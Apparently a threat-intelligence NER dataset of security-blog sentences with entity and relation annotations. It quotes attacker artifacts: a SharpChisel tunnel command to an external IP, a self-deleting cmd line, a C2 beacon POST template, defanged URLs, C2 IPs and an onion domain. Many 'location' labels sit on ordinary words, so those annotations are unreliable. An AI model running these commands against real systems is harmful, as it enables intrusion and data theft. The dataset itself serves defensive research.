id
int64
1
14.4k
text
stringlengths
3
5.01k
entities
list
relations
list
Comments
list
12,043
Our recommendations: Additional resources: Avoid & Report Phishing Emails.
[ { "id": 37265, "label": "attack-pattern", "start_offset": 58, "end_offset": 66 } ]
[]
[]
8,843
Reversing the file revealed that it was the PlugX loader, a remote access tool (RAT) that has been historically used in attacks targeting government-related industries and organizations.
[ { "id": 27380, "label": "malware", "start_offset": 44, "end_offset": 49 }, { "id": 27381, "label": "location", "start_offset": 60, "end_offset": 66 }, { "id": 27382, "label": "location", "start_offset": 74, "end_offset": 78 }, { "id": 27383, "label": "location", "start_offset": 168, "end_offset": 171 } ]
[]
[]
83
Many users realize their system is infected with coin mining malware when their laptop fans kick into high-speed mode to keep the overtaxed CPU cool.
[]
[]
[]
4,424
GeckoHtmlElement > (
[]
[]
[]
5,983
This campaign, targeting high risk individuals in Ukraine, contained links leading to compromised websites where the first stage phishing page was hosted.
[ { "id": 18414, "label": "location", "start_offset": 5, "end_offset": 13 }, { "id": 18417, "label": "attack-pattern", "start_offset": 129, "end_offset": 137 }, { "id": 18418, "label": "location", "start_offset": 138, "end_offset": 142 } ]
[]
[]
7,794
Instead of attachments, it had malicious URLs in the message content that lead to the download of a malicious document named fedex.doc from hxxp://www.fedexdocs[.]top/fedex.doc or hxxp://www.fedexdocs[.]icu/fedex.doc.
[ { "id": 24142, "label": "location", "start_offset": 61, "end_offset": 68 }, { "id": 24143, "label": "threat-actor", "start_offset": 74, "end_offset": 78 } ]
[]
[]
7,364
/up.txt 172.16
[]
[]
[]
605
They’ve done this by moving the Hancitor malware from being a malicious attachment in spam to itself being a malicious download.
[ { "id": 46201, "label": "malware", "start_offset": 33, "end_offset": 41 } ]
[]
[]
3,864
Popup message when the user opens the document that abuses Link Auto Update Koadic sends its own JavaScript code as plain text.
[ { "id": 49725, "label": "malware", "start_offset": 76, "end_offset": 82 } ]
[]
[]
10,652
As organizations reeled from the Log4Shell vulnerability (CVE-2021-44228), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising.
[ { "id": 32519, "label": "attack-pattern", "start_offset": 103, "end_offset": 109 } ]
[]
[]
11,025
Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events.
[ { "id": 33618, "label": "attack-pattern", "start_offset": 42, "end_offset": 48 } ]
[]
[]
3,922
When simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the parameter to be executed:
[]
[]
[]
5,946
Related IOCs
[]
[]
[]
2,419
When web users access trade object properties, the binding process (bindRequestParameters) in the Spring framework implementation will call the getCachedIntrospectionResults method to get and set the object property in the cache.
[ { "id": 47494, "label": "SOFTWARE", "start_offset": 99, "end_offset": 115 } ]
[]
[]
7,257
If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below.
[]
[]
[]
7,254
We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.
[]
[]
[]
4,307
Tags APT & Targeted Attacks | Endpoints | Research | Network
[]
[]
[]
630
AutoFocus users view samples using the Petya tag.
[ { "id": 2102, "label": "malware", "start_offset": 39, "end_offset": 44 } ]
[]
[]
2,312
While the javascript starting the exploit chain checks whether visitors were running macOS Mojave (10.14) or Catalina (10.15) before proceeding to run the exploits, we only observed remnants of an exploit when visiting the site with Mojave but received the full non-encrypted exploit chain when browsing the site with Catalina.
[ { "id": 47376, "label": "SOFTWARE", "start_offset": 85, "end_offset": 105 }, { "id": 47377, "label": "SOFTWARE", "start_offset": 109, "end_offset": 125 }, { "id": 47378, "label": "SOFTWARE", "start_offset": 233, "end_offset": 239 }, { "id": 47379, "label": "SOFTWARE", "start_offset": 318, "end_offset": 326 } ]
[]
[]
2,871
Attackers can manipulate memory allocations by using JavaScript to allocate an object that is freed before all references to that object are removed.
[]
[]
[]
13,584
The first method is uploading a PHP web shell file by calling the native API provided by the framework.
[ { "id": 42347, "label": "attack-pattern", "start_offset": 36, "end_offset": 45 } ]
[]
[]
5,997
While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region.
[ { "id": 18476, "label": "location", "start_offset": 9, "end_offset": 12 }, { "id": 18478, "label": "location", "start_offset": 61, "end_offset": 64 }, { "id": 18480, "label": "identity", "start_offset": 91, "end_offset": 95 }, { "id": 18481, "label": "location", "start_offset": 223, "end_offset": 229 } ]
[]
[]
9,593
POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" }
[ { "id": 29396, "label": "location", "start_offset": 0, "end_offset": 4 }, { "id": 29397, "label": "URL", "start_offset": 5, "end_offset": 44 }, { "id": 29399, "label": "TIME", "start_offset": 206, "end_offset": 217 } ]
[]
[]
14,204
GitHub is no stranger to misuse, however.
[]
[]
[]
3,449
Table 1. Commands observed in CVE-2022-1388 exploitation attempts.
[ { "id": 49222, "label": "vulnerability", "start_offset": 31, "end_offset": 44 } ]
[]
[]
12,638
Figure 6.
[]
[]
[]
12,212
We received leads from Graphika that supported us in this investigation.
[]
[]
[]
10,262
Figures 2-3.
[]
[]
[]
3,017
And many of these devices feature mute buttons that can functionally turn them off when you don’t need them.
[]
[]
[]
1,495
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
[]
[]
[]
4,165
Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.
[ { "id": 49970, "label": "threat-actor", "start_offset": 53, "end_offset": 66 }, { "id": 49971, "label": "location", "start_offset": 79, "end_offset": 102 } ]
[ { "id": 894, "from_id": 49970, "to_id": 49971, "type": "located-at" } ]
[]
11,968
We terminated 9 YouTube channels as part of our investigation into coordinated influence operations linked to China.
[]
[]
[]
12,067
When they did, attackers sent them phishing links in follow-on correspondence.
[ { "id": 37348, "label": "location", "start_offset": 30, "end_offset": 34 }, { "id": 37349, "label": "attack-pattern", "start_offset": 35, "end_offset": 43 } ]
[]
[]
3,123
Here we explain this type of attack and what you should do.
[]
[]
[]
841
Because of this, attacks against the kernel are used to gain complete control over a system, generally as part of an “elevation or privilege” (EoP) or “privilege escalation” attack.
[ { "id": 2756, "label": "attack-pattern", "start_offset": 152, "end_offset": 172 }, { "id": 46393, "label": "attack-pattern", "start_offset": 118, "end_offset": 140 } ]
[]
[]
5,695
Figure 1.
[]
[]
[]
4,507
On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.
[ { "id": 50307, "label": "identity", "start_offset": 3, "end_offset": 8 }, { "id": 50308, "label": "identity", "start_offset": 31, "end_offset": 36 }, { "id": 50309, "label": "attack-pattern", "start_offset": 69, "end_offset": 77 }, { "id": 50311, "label": "attack-pattern", "start_offset": 93, "end_offset": 97 }, { "id": 50310, "label": "attack-pattern", "start_offset": 79, "end_offset": 87 } ]
[]
[]
4,530
APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.
[ { "id": 50326, "label": "attack-pattern", "start_offset": 116, "end_offset": 147 } ]
[]
[]
2,381
After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process.
[ { "id": 7081, "label": "attack-pattern", "start_offset": 55, "end_offset": 72 }, { "id": 47444, "label": "malware", "start_offset": 32, "end_offset": 45 } ]
[ { "id": 325, "from_id": 47444, "to_id": 7081, "type": "uses" } ]
[]
5,746
The Cambridge Analytica scandal continues to haunt Facebook.
[]
[]
[]
9,665
Figure 9.
[]
[]
[]
2,904
s[_local28][(((_local41 - _local12) / 4) + 17)]
[]
[]
[]
10,503
Today, we’re sharing recent findings on government-backed phishing, threats and disinformation, as well as a new bulletin to share information about actions we take against accounts that we attribute to coordinated influence campaigns.
[ { "id": 31940, "label": "attack-pattern", "start_offset": 58, "end_offset": 66 }, { "id": 31941, "label": "location", "start_offset": 76, "end_offset": 79 } ]
[]
[]
5,094
If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript.
[ { "id": 51196, "label": "SOFTWARE", "start_offset": 72, "end_offset": 78 }, { "id": 51197, "label": "attack-pattern", "start_offset": 79, "end_offset": 82 } ]
[]
[]
757
In IE9, for example, it has been applied to every object through MemoryProtection::HeapFree as shown in figure 2.
[ { "id": 46345, "label": "SOFTWARE", "start_offset": 3, "end_offset": 6 } ]
[]
[]
5,511
The $228m penalty levied by the UK’s privacy watchdog reflects the seriousness of the attack and the carrier’s failure to protect its customer’s personal and financial information.
[ { "id": 51522, "label": "identity", "start_offset": 32, "end_offset": 53 } ]
[]
[]
1,334
This registry key ensures that the malware will persist across reboots when the current user logs in.
[]
[]
[]
8,049
The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.
[ { "id": 24974, "label": "location", "start_offset": 83, "end_offset": 86 }, { "id": 24975, "label": "location", "start_offset": 126, "end_offset": 129 }, { "id": 24976, "label": "attack-pattern", "start_offset": 159, "end_offset": 167 }, { "id": 24977, "label": "location", "start_offset": 168, "end_offset": 173 }, { "id": 24978, "label": "location", "start_offset": 177, "end_offset": 181 }, { "id": 24979, "label": "location", "start_offset": 182, "end_offset": 186 } ]
[]
[]
5,005
TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.
[ { "id": 51061, "label": "identity", "start_offset": 0, "end_offset": 3 } ]
[]
[]
2,887
If we go back and examine the exploit code for CVE-2013-3163, we see that the string ‘org’ was originally used as the trigger, and the variable ‘found’ was originally used as a flag indicating if the Vector object was modified.
[ { "id": 48083, "label": "vulnerability", "start_offset": 47, "end_offset": 60 } ]
[]
[]
13,970
Today’s Challenge
[]
[]
[]
2,824
Figure 1 Ransom note for WanaCrypt0r
[ { "id": 8627, "label": "tools", "start_offset": 25, "end_offset": 36 } ]
[]
[]
4,083
We think that this Lilith RAT is a highly modified version of the open-source Lilith RAT.
[ { "id": 49919, "label": "malware", "start_offset": 78, "end_offset": 88 }, { "id": 49918, "label": "malware", "start_offset": 19, "end_offset": 29 } ]
[]
[]
9,445
Stage 2: Dropper
[]
[]
[]
1,792
The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.
[ { "id": 46924, "label": "FILEPATH", "start_offset": 75, "end_offset": 83 }, { "id": 46923, "label": "FILEPATH", "start_offset": 99, "end_offset": 110 } ]
[]
[]
1,385
The in-memory payload (Tbopbh.jpg) is running within the context of the InstallUtil.exe process 9. Multiple instances of cmd.exe calling Ping.exe to delete file InstallUtil.exe, e.g. cmd.exe /min /C ping 111.111.111[.]111 -n 5 -w 10 > Nul & Del /f /q %TEMP%\InstallUtil.exe 10. File AdvancedRun.exe is deleted from the C:\Users\[USERNAME]\AppData\Local\Temp directory by the stage2.exe binary. 11. ICMP traffic to host: 111.111.111[.]111 12.
[ { "id": 4149, "label": "malware", "start_offset": 122, "end_offset": 129 }, { "id": 4150, "label": "malware", "start_offset": 184, "end_offset": 191 }, { "id": 4151, "label": "tools", "start_offset": 200, "end_offset": 204 }, { "id": 4152, "label": "IPV4", "start_offset": 205, "end_offset": 222 }, { "id": 4154, "label": "IPV4", "start_offset": 423, "end_offset": 440 }, { "id": 46732, "label": "FILEPATH", "start_offset": 285, "end_offset": 300 }, { "id": 46730, "label": "FILEPATH", "start_offset": 23, "end_offset": 33 }, { "id": 46731, "label": "FILEPATH", "start_offset": 252, "end_offset": 274 }, { "id": 46733, "label": "FILEPATH", "start_offset": 321, "end_offset": 387 } ]
[]
[]
5,090
The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users.
[]
[]
[]
10,720
Like many cyberespionage campaigns, REDBALDKNIGHT’s attacks are intermittent but drawn-out.
[ { "id": 32751, "label": "location", "start_offset": 5, "end_offset": 9 }, { "id": 32752, "label": "threat-actor", "start_offset": 36, "end_offset": 49 }, { "id": 32753, "label": "location", "start_offset": 60, "end_offset": 63 } ]
[]
[]
8,102
Figure 3.
[]
[]
[]
8,496
This blog has been revised to include new facts that have been released since the original posting.
[]
[]
[]
5,261
Versions of AnubisSpy posed as social news, promotional, healthcare, and entertainment apps.
[ { "id": 51302, "label": "malware", "start_offset": 12, "end_offset": 21 } ]
[]
[]
4,947
Link shorteners and click trackers are heavily used for this purpose, and are oftentimes embedded within PDF files.
[]
[]
[]
6,975
We have been observing CapraRAT samples since 2017, and one of the first samples we analyzed (SHA-256: d9979a41027fe790399edebe5ef8765f61e1eb1a4ee1d11690b4c2a0aa38ae42, detected by Trend Micro as as AndroidOS_Androrat.HRXD)
[ { "id": 21848, "label": "malware", "start_offset": 23, "end_offset": 31 }, { "id": 21850, "label": "location", "start_offset": 53, "end_offset": 56 }, { "id": 21853, "label": "SHA2", "start_offset": 104, "end_offset": 168 } ]
[]
[]
10,081
What is Sunburst?
[]
[]
[]
8,775
We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.
[]
[]
[]
8,367
C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries
[ { "id": 25746, "label": "IPV4", "start_offset": 4, "end_offset": 18 }, { "id": 25747, "label": "IPV4", "start_offset": 19, "end_offset": 32 } ]
[]
[]
6,475
Another instance of SharpChisel with different settings is executed, this time using PowerShell using the following command line: powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999
[ { "id": 20121, "label": "location", "start_offset": 74, "end_offset": 78 }, { "id": 20122, "label": "attack-pattern", "start_offset": 85, "end_offset": 95 } ]
[]
[]
14,391
The delivery and reconnaissance could involve multiple protocols, emails, payloads, files, and credentials.
[]
[]
[]
14,086
While analyzing one malware previously attributed to APT37, it executed practically the same command sequences including the paths and extensions.
[ { "id": 48167, "label": "threat-actor", "start_offset": 53, "end_offset": 58 } ]
[]
[]
7,366
The kit we found is in tgz format, though we have observed some samples disguised as png or jpg.
[]
[]
[]
9,649
Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file.
[ { "id": 29523, "label": "location", "start_offset": 63, "end_offset": 70 }, { "id": 29524, "label": "identity", "start_offset": 88, "end_offset": 91 }, { "id": 29525, "label": "location", "start_offset": 92, "end_offset": 96 }, { "id": 29526, "label": "location", "start_offset": 136, "end_offset": 139 }, { "id": 29527, "label": "location", "start_offset": 182, "end_offset": 185 } ]
[]
[]
5,886
Just like on the physical or kinetic side, we need to be very cognizant of our critical infrastructure.
[ { "id": 18091, "label": "identity", "start_offset": 0, "end_offset": 4 } ]
[]
[]
6,635
They have also been observed using Google Drive for their C2 channel.
[]
[]
[]
227
The webpage is imitating a popular cloud file storage site.
[]
[]
[]
13,149
We found that Tropic Trooper’s latest activities center on targeting Taiwanese and the Philippine military’s physically isolated networks through a USBferry attack (the name derived from a sample found in a related research).
[ { "id": 48927, "label": "threat-actor", "start_offset": 14, "end_offset": 28 }, { "id": 48928, "label": "location", "start_offset": 69, "end_offset": 79 }, { "id": 48929, "label": "location", "start_offset": 87, "end_offset": 98 }, { "id": 48931, "label": "identity", "start_offset": 98, "end_offset": 109 }, { "id": 48930, "label": "malware", "start_offset": 148, "end_offset": 163 } ]
[ { "id": 500, "from_id": 48931, "to_id": 48929, "type": "located-at" }, { "id": 501, "from_id": 48931, "to_id": 48928, "type": "located-at" }, { "id": 503, "from_id": 48927, "to_id": 48930, "type": "uses" }, { "id": 502, "from_id": 48927, "to_id": 48931, "type": "targets" } ]
[]
3,909
Threats such as this can be difficult to detect even with multiple security layers — especially if they are not consolidated. In this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.UWMANA). Technical Analysis
[ { "id": 49758, "label": "malware", "start_offset": 197, "end_offset": 219 }, { "id": 49759, "label": "malware", "start_offset": 248, "end_offset": 276 }, { "id": 49760, "label": "identity", "start_offset": 233, "end_offset": 244 } ]
[]
[]
13,167
Figure 2. USBferry malware’s first version, where the EXE file is the USBferry malware and the DLL file is trojan TROJ_YAHOYAH
[ { "id": 41093, "label": "tools", "start_offset": 12, "end_offset": 20 }, { "id": 41095, "label": "malware", "start_offset": 72, "end_offset": 80 }, { "id": 41096, "label": "location", "start_offset": 89, "end_offset": 92 } ]
[]
[]
14,326
Figure 16.
[]
[]
[]
3,414
Win64.BIOPASS.A
[ { "id": 49104, "label": "malware", "start_offset": 0, "end_offset": 15 } ]
[]
[]
7,384
Figure 5.
[]
[]
[]
7,637
But this attack sent an email with a .rar or .zip attachment.
[]
[]
[]
10,024
— HKTL_BROWSERPASSVIEW.GA URLs related to the malicious update file:
[]
[]
[]
5,425
In the age of work-from-home (WFH) during the pandemic, it’s possible that espionage is part of the reason that IoT devices are still major targets for advanced attackers.
[]
[]
[]
4,616
You can see the path and name of the web shell.
[ { "id": 50523, "label": "attack-pattern", "start_offset": 37, "end_offset": 46 } ]
[]
[]
11,799
When they did, attackers sent them phishing links in follow-on correspondence.
[ { "id": 36389, "label": "location", "start_offset": 30, "end_offset": 34 }, { "id": 36390, "label": "attack-pattern", "start_offset": 35, "end_offset": 43 } ]
[]
[]
3,172
It also has the ability to compromise the private information of its victims by stealing web browser and instant messaging client data.
[]
[]
[]
12,481
We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to France.
[]
[]
[]
7,083
In the version that we’ve analyzed, the installer writes the token in the registry key.
[]
[]
[]
6,219
Figure 13.
[]
[]
[]
7,444
Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users.
[ { "id": 23146, "label": "attack-pattern", "start_offset": 81, "end_offset": 89 } ]
[]
[]
7,169
Last month we tracked new scouting techniques coming from Andariel, which were used mainly against South Korean targets.
[]
[]
[]
6,985
Access the unique identification number Access location information
[]
[]
[]
926
In truth, this version has made a number of improvements, such as adding more file types to target, ignoring certain directories, and using a better encryption routine.
[]
[]
[]
3,084
In the past 48 hours, there has been a flurry of activity as hardware and software vendors move to address two sets of vulnerabilities that have been dubbed “Meltdown” and “Spectre”.
[ { "id": 45764, "label": "vulnerability", "start_offset": 158, "end_offset": 166 }, { "id": 45765, "label": "vulnerability", "start_offset": 173, "end_offset": 180 }, { "id": 9420, "label": "TIME", "start_offset": 3, "end_offset": 20 } ]
[]
[]
10,828
When this message is received, a periodic task for sync message is set.
[]
[]
[]
291
gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id[.]onion
[ { "id": 44687, "label": "DOMAIN", "start_offset": 1, "end_offset": 65 } ]
[]
[]
6,958
Malicious macro codes will download, decode, and execute the ObliqueRat malware Figure 12 shows a summary of the ObliqueRat malware’s infection chain: Figure 12.
[ { "id": 21782, "label": "location", "start_offset": 22, "end_offset": 26 }, { "id": 21783, "label": "location", "start_offset": 45, "end_offset": 48 }, { "id": 21784, "label": "malware", "start_offset": 61, "end_offset": 71 }, { "id": 21786, "label": "tools", "start_offset": 117, "end_offset": 127 } ]
[]
[]
2,385
However, we have yet to retrieve and study one of these plug-ins.
[]
[]
[]
14,046
Figure 5.
[]
[]
[]
11,679
Digging deeper, we found that it hosted several phishing pages.
[ { "id": 35818, "label": "attack-pattern", "start_offset": 48, "end_offset": 56 } ]
[]
[]